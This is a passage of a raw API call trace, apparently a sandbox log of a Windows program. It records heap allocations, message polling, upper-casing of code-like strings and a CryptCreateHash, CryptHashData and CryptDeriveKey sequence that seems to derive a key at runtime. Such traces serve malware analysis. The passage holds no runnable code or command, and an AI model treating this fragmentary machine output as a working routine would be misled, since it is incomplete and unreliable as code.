lpMsg=0x8bf160) returned 0 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.016] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.016] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.017] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.017] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.017] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.017] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.017] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.018] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.018] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.018] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.018] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.018] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.019] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.019] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0260.019] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.019] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.019] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0260.020] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.020] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.020] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.021] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.023] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.023] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0260.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0260.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.024] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.024] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.024] CryptHashData (hHash=0xaa5860, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0260.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.025] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.025] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.025] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.025] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.025] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0260.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 